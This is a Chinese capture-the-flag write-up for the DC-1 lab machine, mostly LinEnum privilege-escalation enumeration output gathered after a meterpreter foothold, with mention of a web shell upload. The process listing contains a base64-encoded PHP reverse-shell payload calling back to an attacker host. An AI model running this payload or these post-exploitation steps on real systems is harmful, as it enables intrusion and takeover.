攻击成功 返回meterpreter的shell


发现并不是root权限 ,想办法进行提权,首先执行常用的Linux提权检查工具


并没有返回可用的提权建议 于是用searchsploit 3.2.0尝试

表红框的exp.c编译并没有成功 提权失败

 上菜刀方便查看文件 shell.php

尝试去进行Linux -udf提权 



发现账号密码 但估计不是高权限



然后用Linux 提权检查工具 查看弱点

   1 [00;31m#########################################################[00m
   2 [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
   3 [00;31m#########################################################[00m
   4 [00;33m#[00m
   5 [00;33m# version 0.95[00m
   7 [-] Debug Info
   8 [00;33m[+] Thorough tests = Disabled[00m
  11 [00;33mScan started at:
  12 Tue May  7 01:08:48 AEST 2019
  13 [00m
  15 [00;33m### SYSTEM ##############################################[00m
  16 [00;31m[-] Kernel information:[00m
  17 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
  20 [00;31m[-] Kernel information (continued):[00m
  21 Linux version 3.2.0-6-486 ( (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
  24 [00;31m[-] Specific release information:[00m
  25 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
  26 NAME="Debian GNU/Linux"
  27 VERSION_ID="7"
  28 VERSION="7 (wheezy)"
  29 ID=debian
  30 ANSI_COLOR="1;31"
  31 HOME_URL=""
  36 [00;31m[-] Hostname:[00m
  37 DC-1
  40 [00;33m### USER/GROUP ##########################################[00m
  41 [00;31m[-] Current user/group info:[00m
  42 uid=33(www-data) gid=33(www-data) groups=33(www-data)
  45 [00;31m[-] Users that have previously logged onto the system:[00m
  46 Username         Port     From             Latest
  47 root             tty1                      Thu Feb 28 12:10:51 +1000 2019
  50 [00;31m[-] Who else is logged on:[00m
  51  01:08:48 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
  52 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  55 [00;31m[-] Group memberships:[00m
  56 uid=0(root) gid=0(root) groups=0(root)
  57 uid=1(daemon) gid=1(daemon) groups=1(daemon)
  58 uid=2(bin) gid=2(bin) groups=2(bin)
  59 uid=3(sys) gid=3(sys) groups=3(sys)
  60 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  61 uid=5(games) gid=60(games) groups=60(games)
  62 uid=6(man) gid=12(man) groups=12(man)
  63 uid=7(lp) gid=7(lp) groups=7(lp)
  64 uid=8(mail) gid=8(mail) groups=8(mail)
  65 uid=9(news) gid=9(news) groups=9(news)
  66 uid=10(uucp) gid=10(uucp) groups=10(uucp)
  67 uid=13(proxy) gid=13(proxy) groups=13(proxy)
  68 uid=33(www-data) gid=33(www-data) groups=33(www-data)
  69 uid=34(backup) gid=34(backup) groups=34(backup)
  70 uid=38(list) gid=38(list) groups=38(list)
  71 uid=39(irc) gid=39(irc) groups=39(irc)
  72 uid=41(gnats) gid=41(gnats) groups=41(gnats)
  73 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  74 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
  75 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
  76 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
  77 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
  78 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
  79 uid=105(mysql) gid=109(mysql) groups=109(mysql)
  80 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
  83 [00;31m[-] Contents of /etc/passwd:[00m
  84 root:x:0:0:root:/root:/bin/bash
  85 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  86 bin:x:2:2:bin:/bin:/bin/sh
  87 sys:x:3:3:sys:/dev:/bin/sh
  88 sync:x:4:65534:sync:/bin:/bin/sync
  89 games:x:5:60:games:/usr/games:/bin/sh
  90 man:x:6:12:man:/var/cache/man:/bin/sh
  91 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  92 mail:x:8:8:mail:/var/mail:/bin/sh
  93 news:x:9:9:news:/var/spool/news:/bin/sh
  94 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  95 proxy:x:13:13:proxy:/bin:/bin/sh
  96 www-data:x:33:33:www-data:/var/www:/bin/sh
  97 backup:x:34:34:backup:/var/backups:/bin/sh
  98 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  99 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 100 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 101 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 102 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 103 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 104 statd:x:102:65534::/var/lib/nfs:/bin/false
 105 messagebus:x:103:107::/var/run/dbus:/bin/false
 106 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 107 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 108 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
 111 [00;31m[-] Super user account(s):[00m
 112 root
 115 [00;31m[-] Are permissions on /home directories lax:[00m
 116 total 12K
 117 drwxr-xr-x  3 root  root  4.0K Feb 19 23:51 .
 118 drwxr-xr-x 23 root  root  4.0K Feb 19 22:34 ..
 119 drwxr-xr-x  2 flag4 flag4 4.0K Feb 19 23:28 flag4
 122 [00;31m[-] Root is allowed to login via SSH:[00m
 123 PermitRootLogin yes
 126 [00;33m### ENVIRONMENTAL #######################################[00m
 127 [00;31m[-] Environment information:[00m
 128 APACHE_PID_FILE=/var/run/
 129 APACHE_RUN_USER=www-data
 130 APACHE_LOG_DIR=/var/log/apache2
 131 PATH=/usr/local/bin:/usr/bin:/bin
 132 PWD=/var/www
 133 APACHE_RUN_GROUP=www-data
 134 LANG=C
 135 SHLVL=1
 136 APACHE_LOCK_DIR=/var/lock/apache2
 137 APACHE_RUN_DIR=/var/run/apache2
 138 _=/usr/bin/env
 141 [00;31m[-] Path information:[00m
 142 /usr/local/bin:/usr/bin:/bin
 145 [00;31m[-] Available shells:[00m
 146 # /etc/shells: valid login shells
 147 /bin/sh
 148 /bin/dash
 149 /bin/bash
 150 /bin/rbash
 153 [00;31m[-] Current umask value:[00m
 154 0022
 155 u=rwx,g=rx,o=rx
 158 [00;31m[-] umask value as specified in /etc/login.defs:[00m
 159 UMASK        022
 162 [00;31m[-] Password and storage information:[00m
 163 PASS_MAX_DAYS    99999
 164 PASS_MIN_DAYS    0
 165 PASS_WARN_AGE    7
 169 [00;33m### JOBS/TASKS ##########################################[00m
 170 [00;31m[-] Cron jobs:[00m
 171 -rw-r--r-- 1 root root  722 Jul  4  2012 /etc/crontab
 173 /etc/cron.d:
 174 total 16
 175 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 176 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 177 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 178 -rw-r--r--  1 root root  510 May 10  2018 php5
 180 /etc/cron.daily:
 181 total 68
 182 drwxr-xr-x  2 root root  4096 Feb 19 23:01 .
 183 drwxr-xr-x 85 root root  4096 May  7 00:08 ..
 184 -rw-r--r--  1 root root   102 Jul  4  2012 .placeholder
 185 -rwxr-xr-x  1 root root   633 May 30  2018 apache2
 186 -rwxr-xr-x  1 root root 14985 Oct 24  2014 apt
 187 -rwxr-xr-x  1 root root   314 Nov  5  2012 aptitude
 188 -rwxr-xr-x  1 root root   355 Jun 11  2012 bsdmainutils
 189 -rwxr-xr-x  1 root root   256 May  3  2016 dpkg
 190 -rwxr-xr-x  1 root root  4125 Feb 11  2018 exim4-base
 191 -rwxr-xr-x  1 root root    89 May 17  2012 logrotate
 192 -rwxr-xr-x  1 root root  1365 Jun 19  2012 man-db
 193 -rwxr-xr-x  1 root root   606 Sep 25  2010 mlocate
 194 -rwxr-xr-x  1 root root   249 May 26  2012 passwd
 196 /etc/cron.hourly:
 197 total 12
 198 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 199 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 200 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 202 /etc/cron.monthly:
 203 total 12
 204 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 205 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 206 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 208 /etc/cron.weekly:
 209 total 16
 210 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 211 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 212 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 213 -rwxr-xr-x  1 root root  907 Jun 19  2012 man-db
 216 [00;31m[-] Crontab contents:[00m
 217 # /etc/crontab: system-wide crontab
 218 # Unlike any other crontab you don't have to run the `crontab'
 219 # command to install the new version when you edit this file
 220 # and files in /etc/cron.d. These files also have username fields,
 221 # that none of the other crontabs do.
 223 SHELL=/bin/sh
 224 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 226 # m h dom mon dow user    command
 227 17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
 228 25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
 229 47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
 230 52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
 231 #
 234 [00;33m### NETWORKING  ##########################################[00m
 235 [00;31m[-] Network and IP info:[00m
 236 eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:f4:98  
 237           inet addr:  Bcast:  Mask:
 238           inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
 239           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 240           RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
 241           TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
 242           collisions:0 txqueuelen:1000 
 243           RX bytes:1325354 (1.2 MiB)  TX bytes:1103771 (1.0 MiB)
 245 lo        Link encap:Local Loopback  
 246           inet addr:  Mask:
 247           inet6 addr: ::1/128 Scope:Host
 248           UP LOOPBACK RUNNING  MTU:16436  Metric:1
 249           RX packets:50 errors:0 dropped:0 overruns:0 frame:0
 250           TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
 251           collisions:0 txqueuelen:0 
 252           RX bytes:4852 (4.7 KiB)  TX bytes:4852 (4.7 KiB)
 255 [00;31m[-] ARP history:[00m
 256 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
 257 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE
 260 [00;31m[-] Nameserver(s):[00m
 261 nameserver
 262 nameserver
 265 [00;31m[-] Default route:[00m
 266 default via dev eth0 
 269 [00;31m[-] Listening TCP:[00m
 270 Active Internet connections (servers and established)
 271 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 272 tcp        0      0    *               LISTEN      -               
 273 tcp        0      0  *               LISTEN      -               
 274 tcp        0      0 *               LISTEN      -               
 275 tcp        0      0*               LISTEN      -               
 276 tcp        0      0   *               LISTEN      -               
 277 tcp        0    480     ESTABLISHED 3406/php        
 278 tcp6       0      0 :::22                   :::*                    LISTEN      -               
 279 tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
 280 tcp6       0      0 :::34190                :::*                    LISTEN      -               
 281 tcp6       0      0 :::111                  :::*                    LISTEN      -               
 282 tcp6       0      0 :::80                   :::*                    LISTEN      -               
 283 tcp6       0      0    TIME_WAIT   -               
 284 tcp6       1      0    CLOSE_WAIT  -               
 287 [00;31m[-] Listening UDP:[00m
 288 Active Internet connections (servers and established)
 289 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 290 udp        0      0 *                           -               
 291 udp        0      0    *                           -               
 292 udp        0      0   *                           -               
 293 udp        0      0   *                           -               
 294 udp        0      0 *                           -               
 295 udp        0      0 *                           -               
 296 udp6       0      0 :::52815                :::*                                -               
 297 udp6       0      0 :::28256                :::*                                -               
 298 udp6       0      0 :::111                  :::*                                -               
 299 udp6       0      0 :::769                  :::*                                -               
 302 [00;33m### SERVICES #############################################[00m
 303 [00;31m[-] Running processes:[00m
 305 root         1  0.0  0.0   2296   780 ?        Ss   00:08   0:01 init [2]  
 306 root         2  0.0  0.0      0     0 ?        S    00:08   0:00 [kthreadd]
 307 root         3  0.0  0.0      0     0 ?        S    00:08   0:00 [ksoftirqd/0]
 308 root         4  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/0:0]
 309 root         6  0.0  0.0      0     0 ?        S    00:08   0:00 [watchdog/0]
 310 root         7  0.0  0.0      0     0 ?        S<   00:08   0:00 [cpuset]
 311 root         8  0.0  0.0      0     0 ?        S<   00:08   0:00 [khelper]
 312 root         9  0.0  0.0      0     0 ?        S    00:08   0:00 [kdevtmpfs]
 313 root        10  0.0  0.0      0     0 ?        S<   00:08   0:00 [netns]
 314 root        11  0.0  0.0      0     0 ?        S    00:08   0:00 [sync_supers]
 315 root        12  0.0  0.0      0     0 ?        S    00:08   0:00 [bdi-default]
 316 root        13  0.0  0.0      0     0 ?        S<   00:08   0:00 [kintegrityd]
 317 root        14  0.0  0.0      0     0 ?        S<   00:08   0:00 [kblockd]
 318 root        15  0.0  0.0      0     0 ?        S    00:08   0:00 [khungtaskd]
 319 root        16  0.0  0.0      0     0 ?        S    00:08   0:00 [kswapd0]
 320 root        17  0.0  0.0      0     0 ?        SN   00:08   0:00 [ksmd]
 321 root        18  0.0  0.0      0     0 ?        S    00:08   0:00 [fsnotify_mark]
 322 root        19  0.0  0.0      0     0 ?        S<   00:08   0:00 [crypto]
 323 root        95  0.0  0.0      0     0 ?        S    00:08   0:00 [khubd]
 324 root       105  0.0  0.0      0     0 ?        S<   00:08   0:00 [ata_sff]
 325 root       115  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_0]
 326 root       125  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_1]
 327 root       134  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_2]
 328 root       135  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_3]
 329 root       136  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_4]
 330 root       137  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_5]
 331 root       138  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_6]
 332 root       139  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_7]
 333 root       140  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_8]
 334 root       141  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_9]
 335 root       142  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_10]
 336 root       143  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_11]
 337 root       144  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_12]
 338 root       145  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_13]
 339 root       146  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_14]
 340 root       147  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_15]
 341 root       148  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_16]
 342 root       149  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_17]
 343 root       150  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_18]
 344 root       151  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_19]
 345 root       152  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_20]
 346 root       153  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_21]
 347 root       154  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_22]
 348 root       155  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_23]
 349 root       156  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_24]
 350 root       157  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_25]
 351 root       158  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_26]
 352 root       159  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_27]
 353 root       160  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_28]
 354 root       161  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_29]
 355 root       162  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_30]
 356 root       163  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_31]
 357 root       190  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:29]
 358 root       191  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:30]
 359 root       308  0.0  0.0      0     0 ?        S    00:08   0:00 [jbd2/sda1-8]
 360 root       309  0.0  0.0      0     0 ?        S<   00:08   0:00 [ext4-dio-unwrit]
 361 root       458  0.0  0.1   2688  1244 ?        Ss   00:08   0:00 udevd --daemon
 362 root       543  0.0  0.0      0     0 ?        S<   00:08   0:00 [ttm_swap]
 363 root       699  0.0  0.0      0     0 ?        S<   00:08   0:00 [kpsmoused]
 364 root      1866  0.0  0.0   2388   904 ?        Ss   00:08   0:00 /sbin/rpcbind -w
 365 statd     1897  0.0  0.1   2660  1280 ?        Ss   00:08   0:00 /sbin/rpc.statd
 366 root      1902  0.0  0.0   2684   888 ?        S    00:08   0:00 udevd --daemon
 367 root      1903  0.0  0.0      0     0 ?        S<   00:08   0:00 [rpciod]
 368 root      1905  0.0  0.0      0     0 ?        S<   00:08   0:00 [nfsiod]
 369 root      1912  0.0  0.0   2592   568 ?        Ss   00:08   0:00 /usr/sbin/rpc.idmapd
 370 root      2215  0.0  0.2  28352  2080 ?        Sl   00:08   0:00 /usr/sbin/rsyslogd -c5
 371 root      2267  0.0  0.0   1892   608 ?        Ss   00:08   0:00 /usr/sbin/acpid
 372 root      2303  0.0  0.8  43680  8928 ?        Ss   00:08   0:00 /usr/sbin/apache2 -k start
 373 daemon    2347  0.0  0.0   2168   316 ?        Ss   00:08   0:00 /usr/sbin/atd
 374 103       2353  0.0  0.0   3032   644 ?        Ss   00:08   0:00 /usr/bin/dbus-daemon --system
 375 www-data  2381  0.0  1.3  48448 14420 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 376 www-data  2382  0.0  1.2  47424 13408 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 377 www-data  2383  0.0  1.4  47676 14836 ?        S    00:08   0:01 /usr/sbin/apache2 -k start
 378 www-data  2384  0.0  1.1  46148 12080 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
 379 root      2438  0.0  0.0   3852   988 ?        Ss   00:08   0:00 /usr/sbin/cron
 380 root      2493  0.0  0.0   1948   588 ?        S    00:08   0:00 /bin/sh /usr/bin/mysqld_safe
 381 mysql     2831  0.0  4.7 329380 49184 ?        Sl   00:08   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/ --socket=/var/run/mysqld/mysqld.sock --port=3306
 382 root      2832  0.0  0.0   1868   604 ?        S    00:08   0:00 logger -t mysqld -p daemon.error
 383 101       3228  0.0  0.0   7424   992 ?        Ss   00:08   0:00 /usr/sbin/exim4 -bd -q30m
 384 root      3281  0.0  0.0   3796   840 tty2     Ss+  00:08   0:00 /sbin/getty 38400 tty2
 385 root      3282  0.0  0.0   3796   836 tty3     Ss+  00:08   0:00 /sbin/getty 38400 tty3
 386 root      3283  0.0  0.0   3796   840 tty4     Ss+  00:08   0:00 /sbin/getty 38400 tty4
 387 root      3284  0.0  0.0   3796   836 tty5     Ss+  00:08   0:00 /sbin/getty 38400 tty5
 388 root      3285  0.0  0.0   3796   840 tty6     Ss+  00:08   0:00 /sbin/getty 38400 tty6
 389 root      3287  0.0  0.0      0     0 ?        S    00:08   0:00 [flush-8:0]
 390 root      3298  0.0  0.2   5196  2320 ?        Ss   00:08   0:00 dhclient -v -pf /run/ -lf /var/lib/dhcp/dhclient.eth0.leases eth0
 391 root      3339  0.0  0.1   6496  1076 ?        Ss   00:08   0:00 /usr/sbin/sshd
 392 root      3354  0.0  0.0   3796   840 tty1     Ss+  00:09   0:00 /sbin/getty 38400 tty1
 393 www-data  3358  0.0  1.5  49688 15620 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 394 www-data  3360  0.0  1.1  45892 11832 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 395 www-data  3361  0.0  1.6  51624 16812 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
 396 www-data  3381  0.0  1.1  45892 11828 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 397 www-data  3385  0.0  1.2  47436 13392 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 398 www-data  3386  0.0  1.2  47416 13320 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 399 www-data  3405  0.0  0.0   1948   540 ?        S    00:39   0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
 400 www-data  3406  0.0  0.8  41132  9032 ?        S    00:39   0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
 401 www-data  3408  0.0  0.0   1948   520 ?        S    00:40   0:00 sh -c /bin/sh 
 402 www-data  3409  0.0  0.0   1948   576 ?        S    00:40   0:00 /bin/sh
 403 root      3488  0.0  0.0      0     0 ?        S    01:01   0:00 [kworker/0:1]
 404 root      4393  0.0  0.0      0     0 ?        S    01:07   0:00 [kworker/0:2]
 405 www-data  4398  0.0  0.1   3500  1764 ?        S    01:08   0:00 /bin/bash ./
 406 www-data  4399  0.0  0.1   3552  1380 ?        S    01:08   0:00 /bin/bash ./
 407 www-data  4400  0.0  0.0   1876   452 ?        S    01:08   0:00 tee -a
 408 www-data  4570  0.0  0.1   3536  1092 ?        S    01:08   0:00 /bin/bash ./
 409 www-data  4571  0.0  0.0   2832   996 ?        R    01:08   0:00 ps aux
 412 [00;31m[-] Process binaries and associated permissions (from above list):[00m
 413 -rwxr-xr-x 1 root root   941252 Oct 27  2016 /bin/bash
 414 lrwxrwxrwx 1 root root        4 Mar  1  2012 /bin/sh -> dash
 415 -rwxr-xr-x 2 root root    26684 Dec 10  2012 /sbin/getty
 416 -rwxr-xr-x 1 root root    68180 May 22  2013 /sbin/rpc.statd
 417 -rwxr-xr-x 1 root root    42836 May 10  2017 /sbin/rpcbind
 418 -rwxr-xr-x 1 root root   436576 Feb 10  2015 /usr/bin/dbus-daemon
 419 -rwxr-xr-x 1 root root    42748 Apr 16  2013 /usr/sbin/acpid
 420 lrwxrwxrwx 1 root root       34 May 30  2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
 421 -rwxr-xr-x 1 root root    21812 Oct  4  2014 /usr/sbin/atd
 422 -rwxr-xr-x 1 root root    43020 Jul  4  2012 /usr/sbin/cron
 423 -rwsr-xr-x 1 root root   937564 Feb 11  2018 /usr/sbin/exim4
 424 -rwxr-xr-x 1 root root 10585256 Apr 20  2018 /usr/sbin/mysqld
 425 -rwxr-xr-x 1 root root    28832 May 22  2013 /usr/sbin/rpc.idmapd
 426 -rwxr-xr-x 1 root root   388200 Oct  8  2014 /usr/sbin/rsyslogd
 427 -rwxr-xr-x 1 root root   531888 Jan 27  2018 /usr/sbin/sshd
 430 [00;31m[-] /etc/init.d/ binary permissions:[00m
 431 total 280
 432 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 433 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 434 -rw-r--r--  1 root root 1586 Feb 19 23:02 .depend.boot
 435 -rw-r--r--  1 root root  669 Feb 19 23:02 .depend.start
 436 -rw-r--r--  1 root root  769 Feb 19 23:02 .depend.stop
 437 -rw-r--r--  1 root root 2427 Oct 16  2012 README
 438 -rwxr-xr-x  1 root root 2227 Apr 16  2013 acpid
 439 -rwxr-xr-x  1 root root 7820 May 26  2018 apache2
